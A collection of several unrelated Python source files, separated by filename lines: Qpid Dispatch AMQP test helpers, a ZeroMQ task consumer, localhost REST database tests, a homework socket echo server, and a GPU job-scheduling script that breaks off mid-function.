"""
Return the module name of the __main__ module - i.e. the filename with the
path and .py extension stripped. Useful to run the tests in the current file but
using the proper module prefix instead of '__main__', as follows:
if __name__ == '__main__':
unittest.main(module=main_module())
"""
return os.path.splitext(os.path.basename(__main__.__file__))[0]
class AsyncTestReceiver(MessagingHandler):
"""
A simple receiver that runs in the background and queues any received
messages. Messages can be retrieved from this thread via the queue member.
:param wait: block the constructor until the link has been fully
established.
:param recover_link: restart on remote link detach
"""
Empty = Queue.Empty
def __init__(self, address, source, conn_args=None, container_id=None,
wait=True, recover_link=False, msg_args=None):
if msg_args is None:
msg_args = {}
super(AsyncTestReceiver, self).__init__(**msg_args)
self.address = address
self.source = source
self.conn_args = conn_args
self.queue = Queue.Queue()
self._conn = None
self._container = Container(self)
cid = container_id or "ATR-%s:%s" % (source, uuid.uuid4())
self._container.container_id = cid
self._ready = Event()
self._recover_link = recover_link
self._recover_count = 0
self._stop_thread = False
self._thread = Thread(target=self._main)
self._thread.daemon = True
self._thread.start()
if wait and self._ready.wait(timeout=TIMEOUT) is False:
raise Exception("Timed out waiting for receiver start")
def _main(self):
self._container.timeout = 0.5
self._container.start()
while self._container.process():
if self._stop_thread:
if self._conn:
self._conn.close()
self._conn = None
def stop(self, timeout=TIMEOUT):
self._stop_thread = True
self._container.wakeup()
self._thread.join(timeout=TIMEOUT)
if self._thread.is_alive():
raise Exception("AsyncTestReceiver did not exit")
del self._conn
del self._container
def on_start(self, event):
kwargs = {'url': self.address}
if self.conn_args:
kwargs.update(self.conn_args)
self._conn = event.container.connect(**kwargs)
def on_connection_opened(self, event):
kwargs = {'source': self.source}
rcv = event.container.create_receiver(event.connection,
**kwargs)
def on_link_opened(self, event):
self._ready.set()
def on_link_closing(self, event):
event.link.close()
if self._recover_link and not self._stop_thread:
# lesson learned: the generated link name will be the same as the
# old link (which is bad) so we specify a new one
self._recover_count += 1
kwargs = {'source': self.source,
'name': "%s:%s" % (event.link.name, self._recover_count)}
rcv = event.container.create_receiver(event.connection,
**kwargs)
def on_message(self, event):
self.queue.put(event.message)
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
if self._conn:
self._conn.close()
self._conn = None
class AsyncTestSender(MessagingHandler):
"""
A simple sender that runs in the background and sends 'count' messages to a
given target.
"""
class TestSenderException(Exception):
def __init__(self, error=None):
super(AsyncTestSender.TestSenderException, self).__init__(error)
def __init__(self, address, target, count=1, message=None,
container_id=None, presettle=False):
super(AsyncTestSender, self).__init__(auto_accept=False,
auto_settle=False)
self.address = address
self.target = target
self.total = count
self.presettle = presettle
self.accepted = 0
self.released = 0
self.modified = 0
self.rejected = 0
self.sent = 0
self.error = None
self.link_stats = None
self._conn = None
self._sender = None
self._message = message or Message(body="test")
self._container = Container(self)
cid = container_id or "ATS-%s:%s" % (target, uuid.uuid4())
self._container.container_id = cid
self._link_name = "%s-%s" % (cid, "tx")
self._thread = Thread(target=self._main)
self._thread.daemon = True
self._thread.start()
def _main(self):
self._container.timeout = 0.5
self._container.start()
while self._container.process():
self._check_if_done()
def wait(self):
# don't stop it - wait until everything is sent
self._thread.join(timeout=TIMEOUT)
assert not self._thread.is_alive(), "sender did not complete"
if self.error:
raise AsyncTestSender.TestSenderException(self.error)
del self._sender
del self._conn
del self._container
def on_start(self, event):
self._conn = self._container.connect(self.address)
def on_connection_opened(self, event):
option = AtMostOnce if self.presettle else AtLeastOnce
self._sender = self._container.create_sender(self._conn,
target=self.target,
options=option(),
name=self._link_name)
def on_sendable(self, event):
if self.sent < self.total:
self._sender.send(self._message)
self.sent += 1
def _check_if_done(self):
done = (self.sent == self.total
and (self.presettle
or (self.accepted + self.released + self.modified
+ self.rejected == self.sent)))
if done and self._conn:
self.link_stats = get_link_info(self._link_name,
self.address)
self._conn.close()
self._conn = None
def on_accepted(self, event):
self.accepted += 1
event.delivery.settle()
def on_released(self, event):
# for some reason Proton 'helpfully' calls on_released even though the
# delivery state is actually MODIFIED
if event.delivery.remote_state == Delivery.MODIFIED:
return self.on_modified(event)
self.released += 1
event.delivery.settle()
def on_modified(self, event):
self.modified += 1
event.delivery.settle()
def on_rejected(self, event):
self.rejected += 1
event.delivery.settle()
def on_link_error(self, event):
self.error = "link error:%s" % str(event.link.remote_condition)
if self._conn:
self._conn.close()
self._conn = None
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
self.error = "connection to remote dropped"
if self._conn:
self._conn.close()
self._conn = None
class QdManager(object):
"""
A means to invoke qdmanage during a testcase
"""
def __init__(self, tester=None, address=None, timeout=TIMEOUT,
router_id=None,
edge_router_id=None):
# 'tester' - can be 'self' when called in a test,
# or an instance any class derived from Process (like Qdrouterd)
self._tester = tester or Tester(None)
self._timeout = timeout
self._address = address
self.router_id = router_id
self.edge_router_id = edge_router_id
self.router = []
if self.router_id:
self.router = self.router + ['--router', self.router_id]
elif self.edge_router_id:
self.router = self.router + ['--edge-router', self.edge_router_id]
def __call__(self, cmd, address=None, input=None, expect=Process.EXIT_OK,
timeout=None):
assert address or self._address, "address missing"
p = self._tester.popen(
['qdmanage'] + cmd.split(' ')
+ self.router + ['--bus', address or self._address,
'--indent=-1',
'--timeout', str(timeout or self._timeout)],
stdin=PIPE, stdout=PIPE, stderr=STDOUT, expect=expect,
universal_newlines=True)
out = p.communicate(input)[0]
try:
p.teardown()
except Exception as e:
raise Exception("%s\n%s" % (e, out))
return out
def create(self, long_type, kwargs):
cmd = "CREATE --type=%s" % long_type
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def update(self, long_type, kwargs, name=None, identity=None):
cmd = 'UPDATE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def delete(self, long_type, name=None, identity=None):
cmd = 'DELETE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
else:
assert False, "name or identity not supplied!"
self(cmd)
def query(self, long_type):
return json.loads(self('QUERY --type=%s' % long_type))
def get_log(self, limit=None):
cmd = 'GET-LOG'
if (limit):
cmd += " limit=%s" % limit
return json.loads(self(cmd))
class MgmtMsgProxy(object):
"""
Utility for creating and inspecting management messages
"""
class _Response(object):
def __init__(self, status_code, status_description, body):
self.status_code = status_code
self.status_description = status_description
if body.__class__ == dict and len(body.keys()) == 2 and 'attributeNames' in body.keys() and 'results' in body.keys():
results = []
names = body['attributeNames']
for result in body['results']:
result_map = {}
for i in range(len(names)):
result_map[names[i]] = result[i]
results.append(MgmtMsgProxy._Response(status_code, status_description, result_map))
self.attrs = {'results': results}
else:
self.attrs = body
def __getattr__(self, key):
return self.attrs[key]
def __init__(self, reply_addr):
self.reply_addr = reply_addr
def response(self, msg):
ap = msg.properties
return self._Response(ap['statusCode'], ap['statusDescription'], msg.body)
def query_router(self):
ap = {'operation': 'QUERY', 'type': 'org.apache.qpid.dispatch.router'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_connections(self):
ap = {'operation': 'QUERY', 'type': 'org.apache.qpid.dispatch.connection'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_links(self):
ap = {'operation': 'QUERY', 'type': 'org.apache.qpid.dispatch.router.link'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_link_routes(self):
ap = {'operation': 'QUERY',
'type': 'org.apache.qpid.dispatch.router.config.linkRoute'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_addresses(self):
ap = {'operation': 'QUERY',
'type': 'org.apache.qpid.dispatch.router.address'}
return Message(properties=ap, reply_to=self.reply_addr)
def create_link_route(self, name, kwargs):
ap = {'operation': 'CREATE',
'type': 'org.apache.qpid.dispatch.router.config.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_link_route(self, name):
ap = {'operation': 'DELETE',
'type': 'org.apache.qpid.dispatch.router.config.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
def create_connector(self, name, **kwargs):
ap = {'operation': 'CREATE',
'type': 'org.apache.qpid.dispatch.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_connector(self, name):
ap = {'operation': 'DELETE',
'type': 'org.apache.qpid.dispatch.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
def query_conn_link_routes(self):
ap = {'operation': 'QUERY',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute'}
return Message(properties=ap, reply_to=self.reply_addr)
def create_conn_link_route(self, name, kwargs):
ap = {'operation': 'CREATE',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_conn_link_route(self, name):
ap = {'operation': 'DELETE',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
def read_conn_link_route(self, name):
ap = {'operation': 'READ',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
class TestTimeout(object):
"""
A callback object for MessagingHandler class
parent: A MessagingHandler with a timeout() method
"""
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.timeout()
class PollTimeout(object):
"""
A callback object for MessagingHandler scheduled timers
parent: A MessagingHandler with a poll_timeout() method
"""
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.poll_timeout()
def get_link_info(name, address):
"""
Query the router at address for the status and statistics of the named link
"""
qdm = QdManager(address=address)
rc = qdm.query('org.apache.qpid.dispatch.router.link')
for item in rc:
if item.get('name') == name:
return item
return None
def has_mobile_dest_in_address_table(address, dest):
qdm = QdManager(address=address)
rc = qdm.query('org.apache.qpid.dispatch.router.address')
has_dest = False
for item in rc:
if dest in item.get("name"):
has_dest = True
break
return has_dest
def get_inter_router_links(address):
"""
Return a list of all links with type="inter-router
:param address:
"""
inter_router_links = []
qdm = QdManager(address=address)
rc = qdm.query('org.apache.qpid.dispatch.router.link')
for item in rc:
if item.get("linkType") == "inter-router":
inter_router_links.append(item)
return inter_router_links
class Timestamp(object):
"""
Time stamps for logging.
"""
def __init__(self):
self.ts = datetime.now()
def __str__(self):
return self.ts.strftime("%Y-%m-%d %H:%M:%S.%f")
class Logger(object):
"""
Record an event log for a self test.
May print per-event or save events to be printed later.
Optional file opened in 'append' mode to which each log line is written.
"""
def __init__(self,
title="Logger",
print_to_console=False,
save_for_dump=True,
ofilename=None):
self.title = title
self.print_to_console = print_to_console
self.save_for_dump = save_for_dump
self.logs = []
self.ofilename = ofilename
def log(self, msg):
ts = Timestamp()
if self.save_for_dump:
self.logs.append((ts, msg))
if self.print_to_console:
print("%s %s" % (ts, msg))
sys.stdout.flush()
if self.ofilename is not None:
with open(self.ofilename, 'a') as f_out:
f_out.write("%s %s\n" % (ts, msg))
f_out.flush()
def dump(self):
print(self)
sys.stdout.flush()
def __str__(self):
lines = [self.title]
for ts, msg in self.logs:
lines.append("%s %s" % (ts, msg))
res = str('\n'.join(lines))
return res
|
zeromq_consumer.py
|
# -*- coding: utf-8 -*-
# @Author : ydf
import os
import socket
import json
# import time
import zmq
import multiprocessing
from function_scheduling_distributed_framework.constant import BrokerEnum, ConcurrentModeEnum
from function_scheduling_distributed_framework.consumers.base_consumer import AbstractConsumer
from nb_log import get_logger
# noinspection PyPep8
def check_port_is_used(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# noinspection PyPep8,PyBroadException
try:
s.connect((ip, int(port)))
s.shutdown(2)
# 利用shutdown()函数使socket双向数据传输变为单向数据传输。shutdown()需要一个单独的参数,
# 该参数表示了如何关闭socket。具体为:0表示禁止将来读;1表示禁止将来写;2表示禁止将来读和写。
return True
except Exception:
return False
logger_zeromq_broker = get_logger('zeromq_broker')
# noinspection PyUnresolvedReferences
def start_broker(port_router: int, port_dealer: int):
try:
context = zmq.Context()
# noinspection PyUnresolvedReferences
frontend = context.socket(zmq.ROUTER)
backend = context.socket(zmq.DEALER)
frontend.bind(f"tcp://*:{port_router}")
backend.bind(f"tcp://*:{port_dealer}")
# Initialize poll set
poller = zmq.Poller()
poller.register(frontend, zmq.POLLIN)
poller.register(backend, zmq.POLLIN)
logger_zeromq_broker.info(f'broker 绑定端口 {port_router} {port_dealer} 成功')
# Switch messages between sockets
# noinspection DuplicatedCode
while True:
socks = dict(poller.poll()) # 轮询器 循环接收
if socks.get(frontend) == zmq.POLLIN:
message = frontend.recv_multipart()
backend.send_multipart(message)
if socks.get(backend) == zmq.POLLIN:
message = backend.recv_multipart()
frontend.send_multipart(message)
except Exception as e:
logger_zeromq_broker.warning(e)
class ZeroMqConsumer(AbstractConsumer):
"""
zeromq 中间件的消费者,zeromq基于socket代码,不会持久化,且不需要安装软件。
"""
BROKER_KIND = BrokerEnum.ZERO_MQ
def start_broker_queue_name_as_port(self):
# threading.Thread(target=self._start_broker).start()
# noinspection PyBroadException
try:
if not (10000 < int(self._queue_name) < 65535):
raise ValueError(",请设置queue的名字是一个 10000到65535的之间的一个端口数字")
except Exception:
self.logger.critical(f" zeromq 模式以 queue 的民资作为tcp 端口,请设置queue的名字是一个 10000 到 65535 之间的一个端口数字")
# noinspection PyProtectedMember
os._exit(444)
if check_port_is_used('127.0.0.1', int(self._queue_name)):
self.logger.debug(f"""{int(self._queue_name)} router端口已经启动(或占用) """)
return
if check_port_is_used('127.0.0.1', int(self._queue_name) + 1):
self.logger.debug(f"""{int(self._queue_name) + 1} dealer 端口已经启动(或占用) """)
return
multiprocessing.Process(target=start_broker, args=(int(self._queue_name), int(self._queue_name) + 1)).start()
# noinspection DuplicatedCode
def _shedual_task(self):
self.start_broker_queue_name_as_port()
context = zmq.Context()
# noinspection PyUnresolvedReferences
zsocket = context.socket(zmq.REP)
zsocket.connect(f"tcp://localhost:{int(self._queue_name) + 1}")
while True:
message = zsocket.recv()
# self.logger.debug(f""" 从 zeromq 取出的消息是 {message}""")
self._print_message_get_from_broker('zeromq', message)
self._submit_task({'body': json.loads(message)})
zsocket.send('recv ok'.encode())
def _confirm_consume(self, kw):
pass #
def _requeue(self, kw):
self.publisher_of_same_queue.publish(kw['body'])
|
test_simple_rest_get_set.py
|
from contextlib import contextmanager
import requests
import sqlalchemy as sa
from sqlalchemy import exc
TEST_DB_NAME = 'test_rest_pgfire'
def get_test_config():
return {
"db": {
"db": TEST_DB_NAME,
"username": "postgres",
"port": 5432,
"password": "123456",
"host": "localhost"
}
}
@contextmanager
def db_connection():
db_props = get_test_config()
db_host = db_props.get("db").get("host")
db_port = db_props.get("db").get("port")
db_user = db_props.get("db").get("username")
db_password = db_props.get("db").get("password")
db_name = ''
connection_string = 'postgresql+psycopg2://{}:{}@{}:{}/{}'.format(db_user,
db_password,
db_host,
db_port,
db_name)
engine = sa.create_engine(connection_string)
conn = engine.connect()
yield conn
conn.close()
engine.dispose()
def setup_module(module):
with db_connection() as conn:
conn = conn.execution_options(autocommit=False)
conn.execute("ROLLBACK")
try:
conn.execute("DROP DATABASE %s" % TEST_DB_NAME)
except sa.exc.ProgrammingError as e:
# Could not drop the database, probably does not exist
conn.execute("ROLLBACK")
except sa.exc.OperationalError as e:
# Could not drop database because it's being accessed by other users (psql prompt open?)
conn.execute("ROLLBACK")
conn.execute("CREATE DATABASE %s" % TEST_DB_NAME)
start_app()
process = None
def teardown_module(module):
stop_app()
def stop_app():
global process
process.terminate()
process.join()
def __start_app():
from app import prepare_app
from aiohttp import web
app = prepare_app()
# override test config
app['config'] = get_test_config()
web.run_app(app, host="localhost", port=8666)
def start_app():
global process
from multiprocessing import Process
import time
process = Process(target=__start_app)
process.start()
time.sleep(2)
def test_create_json_db():
url = 'http://localhost:8666/createdb'
data = {
"db_name": "a_json_db"
}
response = requests.post(url=url, json=data)
assert response.ok
# # create the same db again
# response = requests.post(url=url, json=data)
# assert response.status_code == 400
def test_get_put_post_delete_from_app():
# create json db
json_db_name = "a_json_db_1"
url = 'http://localhost:8666/createdb'
data = {
"db_name": json_db_name
}
response = requests.post(url=url, json=data)
assert response.ok
path = "rest/saving-data/fireblog/users"
data = {
"alanisawesome": {
"name": "Alan Turing",
"birthday": "June 23, 1912"
}
}
# put data
url = 'http://localhost:8666/database/%s/%s'
response = requests.put(url=url % (json_db_name, path), json=data)
assert response.ok
assert response.json() == data
# get data
response = requests.get(url=url % (json_db_name, "rest/saving-data/fireblog"))
assert response.ok
d = response.json()
assert response.json() == {"users": {"alanisawesome": {"name": "Alan Turing", "birthday": "June 23, 1912"}}}
# patch data
path = "rest/saving-data/fireblog/users/alanisawesome"
data = {"nickname": "Alan The Machine"}
response = requests.patch(url=url % (json_db_name, path), json=data)
assert response.ok
assert response.json() == data
# post data
path = "rest/saving-data/fireblog/posts"
data = {"author": "gracehopper", "title": "The nano-stick"}
response = requests.post(url=url % (json_db_name, path), json=data)
assert response.ok
posted_data = response.json()
assert requests.get(url=url % (
json_db_name,
"rest/saving-data/fireblog/posts/%s" % list(posted_data.keys())[0])
).json() == data
# delete data
path = "rest/saving-data/fireblog/users/alanisawesome"
response = requests.delete(url=url % (json_db_name, path))
assert response.ok
response = requests.get(url=url % (json_db_name, path))
assert response.ok
def test_delete_json_db():
# create json db
json_db_name = "a_json_db_2"
url = 'http://localhost:8666/createdb'
data = {
"db_name": json_db_name
}
response = requests.post(url=url, json=data)
assert response.ok
url = 'http://localhost:8666/deletedb'
response = requests.delete(url=url, json=data)
assert response.ok
data_received_count1 = 0
def test_eventsource_api():
# create json db
json_db_name = "a_json_db_3"
url = 'http://localhost:8666/createdb'
data = {
"db_name": json_db_name
}
response = requests.post(url=url, json=data)
assert response.ok
import threading
url_event = 'http://localhost:8666/database_events/%s/%s'
url = 'http://localhost:8666/database/%s/%s'
post_data1 = {"t": 1}
post_data2 = {"t": 2}
post_data3 = {"t": 3}
listen_path = 'rest/saving-data/fireblog1/posts'
requests.post(url=url % (json_db_name, listen_path), json=post_data1)
from sseclient import SSEClient
sse = SSEClient(url_event % (json_db_name, listen_path))
def message_listener():
global data_received_count1
for msg in sse:
data_received_count1 += 1
print("SSE:" + str(msg))
thr = threading.Thread(target=message_listener)
thr.setDaemon(True)
thr.start()
# write data
import time
time.sleep(5)
requests.post(url=url % (json_db_name, listen_path), json=post_data2)
requests.post(url=url % (json_db_name, listen_path), json=post_data3)
time.sleep(5)
assert data_received_count1 == 3
|
hw7.py
|
from dominate import document
from dominate.tags import div, attr, p
from time import sleep
import socket
import threading
def create_doc(my_date = ""):
doc = document(title="My favorite page")
with doc:
with div():
attr(cls="body")
p("lorem ipsum")
p(f"{my_date}")
return doc
def echo_server(host, port):
with socket.socket() as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(1024)
str_data = str(data, "UTF-8")
if not data:
break
print(f"From client: {data}")
if str_data != "done":
html_data = create_doc(str_data)
conn.send(b"HTML-document was generate!")
else:
conn.send(b"Transaction are beended!")
def simple_client(host, port, message = ''):
with socket.socket() as s:
while True:
try:
s.connect((host, port))
print(f"Connected with host - {host} by port - {port}")
s.sendall(bytes(message,"UTF-8"))
data = s.recv(1024)
print(f"From server: {data}")
break
except ConnectionRefusedError:
sleep(0.5)
def main():
host = "127.0.0.1"
port = 55555
message = ''
while message != "done":
message = input("Enter that You to find:\t")
server = threading.Thread(target=echo_server, args=(host, port))
client = threading.Thread(target=simple_client, args=(host, port, message))
server.start()
client.start()
server.join()
client.join()
if __name__ == "__main__":
main()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
import gpu_pwr
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
V100_epoch_time = {}
for item in queue:
V100_epoch_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
promote_start_time = {}
for item in queue:
promote_start_time[str(item)] = 0
demote_list = []
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
birthplace = {}
for item in queue:
birthplace[str(item)] = 'none'
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1024'
host_node = 'c0170'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('v100_data/x_data.json') as f:
x_train = json.load(f)
with open('v100_data/y_data.json') as f:
y_train = json.load(f)
model_V100 = neighbors.KNeighborsRegressor(n_neighbors = 4, weights='distance')
model_V100.fit(x_train, y_train)
with open('k80_data/x_data.json') as f:
x_train = json.load(f)
with open('k80_data/y_data.json') as f:
y_train = json.load(f)
model_K80 = neighbors.KNeighborsRegressor(n_neighbors = 1, weights='distance')
model_K80.fit(x_train, y_train)
####################################################################
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always force demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = demote_list
#if 'idle' in V100_qual:
# V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if num_promote <= V100_vacant: # promote all jobs as well
return promote_list[:], force_demote[:]
else:
pool_dict = {}
V100_avail = V100_vacant + len(V100_qual)
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(demote_list).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.05:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
# situations below won't happen
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError('Bug, demotion shouldnt happen because no practical complete')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicate too frequently
def kill_job(node, job): # kill_job('c2176', '50'), this is to kill the run.sh associated with the job
send_signal(node, 'kill ' + job)
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list, node):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global V100_epoch_time
global K80_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
if node == V100_node:
V100_epoch_time[job] = wall_time[1] - wall_time[0]
elif node == K80_node:
K80_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list, node):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global V100_epoch_time
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
if node == K80_node:
K80_epoch_time[job] = wall_time[1] - wall_time[0]
V100_time_step2 = V100_epoch_time[job]
K80_time_step2 = wall_time[1] - wall_time[0]
elif node == V100_node:
V100_epoch_time[job] = wall_time[1] - wall_time[0]
K80_time_step2 = K80_epoch_time[job]
V100_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
# measure job
def measure_job(node, gpu, job):
cmd = 'measure ' + job + ' gpu ' + gpu
send_signal(node, cmd)
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
